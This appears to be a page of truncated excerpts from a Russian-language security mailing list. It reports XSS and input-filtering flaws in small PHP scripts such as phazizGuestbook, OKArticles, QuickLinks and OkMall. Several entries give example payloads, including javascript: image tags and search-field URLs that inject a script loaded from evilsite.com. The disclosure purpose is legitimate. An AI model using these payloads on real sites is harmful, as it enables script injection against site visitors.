Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SelectaPix.
Компьютер для продвинутых пользователей В этом выпуске: SelectaPix ПО: SelectaPix Версия: 1.31 Сайт: http://www.outofthetrees.co.uk/selectapix/index.php О SelectaPix: SelectaPix - это свободно распространяемая система для создания галерей, основанная на PHP/MySQL, которая поможет создать галерею за несколько минут. Защита пароля администраторской секции позволяет вам загружать до 10 jpeg изображений за один раз. Позволяет создавать альбомы и под-альбомы. Уязвимость: Обнаружена уязвимость позволяющая провес...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в phazizGuestbook.
Компьютер для продвинутых пользователей В этом выпуске: phazizGuestbook ПО: phazizGuestbook Версия: 2.0 Сайт: http://www.devhome.de/#english_version Уязвимость: Поля name, email, url, text не проверяються перед выполнением, что дает возможность вставить код. Использование: Вставляем код в поля. Пример кода: <IMG SRC=javascript:alert(...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в OKArticles.
Компьютер для продвинутых пользователей В этом выпуске: OKArticles ПО: OKArticles Версия: 1.0 Сайт: http://www.okscripts.com/ Уязвимость: Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки. Использование: В поле поиска введите код: IMG SRC=javascript:alert'XSS) Через ссылку: http://www.example.com/okarticles/demo/search.php?q[SCRIPT%20SRC=http://evilsite.com/xss.js[/SCRIPT] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информац...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в QuickLinks.
Компьютер для продвинутых пользователей В этом выпуске: QuickLinks ПО: QuickLinks Версия: 1.1 Сайт: http://www.okscripts.com/ Уязвимость: Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки. Использование: В поле поиска введите код: IMG SRC=javascript:alert'XSS) Через ссылку: http://www.example.com/quicklinks/demo/search.php?q[SCRIPT%20SRC=http://evilsite.com/xss.js[/SCRIPT] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информац...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в OkMall.
Компьютер для продвинутых пользователей В этом выпуске: OkMall ПО: OkMall Версия: 1.0 Уязвимость: Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки. Использование: Через ссылку: http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20...